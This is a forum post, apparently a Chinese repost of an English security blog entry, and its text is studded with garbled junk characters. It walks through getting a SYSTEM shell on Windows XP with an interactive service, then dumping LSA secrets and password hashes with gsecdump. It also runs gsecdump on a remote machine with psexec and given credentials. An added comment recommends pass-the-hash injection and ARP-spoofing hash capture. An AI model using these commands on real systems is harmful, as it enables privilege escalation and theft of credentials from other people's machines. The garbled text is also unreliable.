o get a DOS Prompt as NT system:
4 m' t+ j+ u5 W$ s# `: F9 I. Q6 i% v5 h8 Y3 Z
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact, Y; g. u, m. f: w1 J+ ~# i4 ^
[SC] CreateService SUCCESS+ p% @7 Z I0 H$ Q+ t; N8 X& f
1 P6 \6 ?7 K4 ]! r$ @' A
C:\>sc start shellcmdline
) [- c& |# d4 a[SC] StartService FAILED 1053:, ^8 c% g: v8 [6 [4 Y
2 o' y! x( t/ {/ Q! H( j2 }The service did not respond to the start or control request in a timely fashion.
, T+ ^" j4 B7 r+ x; c; N
% |7 }! u% p% c0 l D9 LC:\>sc delete shellcmdline. j% I& j' [$ l, _; q% g
[SC] DeleteService SUCCESS- Z9 S+ I5 M& L, ]/ b K
9 ]: V7 d+ t Z7 R+ e( I
------------
1 K# d0 g, J! c/ @
9 t6 }, V9 p' e7 P% ^% R/ {Then in the new DOS window:: I, p$ Q. I$ t6 n( X
2 }' D* E F" D6 X+ y# b1 Y# JMicrosoft Windows XP [Version 5.1.2600]
7 p9 @3 o# v4 L(C) Copyright 1985-2001 Microsoft Corp." r2 K6 U. ~2 G5 G( }
+ n$ d2 h& |5 |7 {# B
C:\WINDOWS\system32>whoami
; V$ { Y! f. m- S+ R$ PNT AUTHORITY\SYSTEM8 Z; W. x0 I8 w5 H1 g, I6 U0 ^& U" O
& {: K0 x( z0 h/ J, `& s% G1 yC:\WINDOWS\system32>gsecdump -h+ u" d/ Z! u$ x! \ b$ ^
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
6 Q* ]- f/ o+ @" F- l% Y7 Busage: gsecdump [options]$ ]9 ~% E! s6 h) m, C( z
4 G) E3 W3 n4 w; j( |+ Koptions:( t. G3 m( D, P$ `
-h [ --help ] show help7 V' X5 R5 r, l; E( Z- l5 C. Y
-a [ --dump_all ] dump all secrets
, o8 U" _" N% a-l [ --dump_lsa ] dump lsa secrets
4 ` L/ L0 _$ G# a6 a-w [ --dump_wireless ] dump microsoft wireless connections( m9 P0 E# X3 m4 m7 a* Y2 v: k
-u [ --dump_usedhashes ] dump hashes from active logon sessions
9 b/ _/ O( H- `1 k7 W3 O-s [ --dump_hashes ] dump hashes from SAM/AD$ h! s7 x$ b, s1 p! g$ R0 J
& A& ?, o% V! T
Although I like to use:- K) m9 V- w* a0 o1 c X" C
1 K/ T5 O8 _& G6 V& U* ]' U( XPsExec v1.83 - Execute processes remotely
: ~' q* o, Z8 X1 k% [5 `% HCopyright (C) 2001-2007 Mark Russinovich4 p* p t( M+ I; b# x7 ]
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
3 n% V1 L3 ], _( n+ X6 T+ u
( \5 c- t. P; g1 vC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT4 d a4 b+ W% s5 R/ p' Y# F* R+ m+ Q
; p+ p$ X G4 K, M2 w; q+ D$ N8 a# v# yto get the hashes from active logon sessions of a remote system./ Y9 Z2 G0 e) ]/ n3 \6 O) k
5 s8 T3 g) m b/ L) jThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.$ b% m* z& _4 K3 G3 Z" h$ o) j) v
% S6 C1 C7 f S# Z& v, M* d- {4 ?提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
; Y( O! B0 T+ a0 f) d+ I9 q原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]9 }8 Y7 y X% L: |. o, R! P. D) u
" v( P2 d$ T0 P* w. f$ ]我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。* D, U9 p3 R# }8 a+ J
|
发表于 2012-11-6 21:09:29
收藏
支持
反对